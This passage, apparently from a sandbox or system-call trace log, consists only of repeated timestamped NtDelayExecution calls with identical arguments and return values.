(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.244] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.246] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.249] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.258] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.261] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.264] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.265] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.267] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.268] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.270] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.273] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.274] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.276] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.277] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.279] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.280] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.282] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.283] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.286] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.291] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.295] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.326] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.376] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.383] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.428] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.431] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.464] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.481] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.487] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.517] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.528] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.535] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.540] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.567] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.573] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.576] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.582] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.591] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.603] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.620] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.626] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.629] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.643] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.652] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.683] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.684] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.686] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.687] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.689] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.692] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.694] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.695] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.697] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.698] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.700] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.701] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.703] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.704] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.706] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.707] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.709] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.710] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.712] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.734] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.837] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.858] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.889] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.891] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.894] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.895] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.898] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.901] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.904] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.907] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0122.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.030] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.040] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.043] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.046] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.047] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.049] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.052] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.055] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0123.061] NtDelayExecution 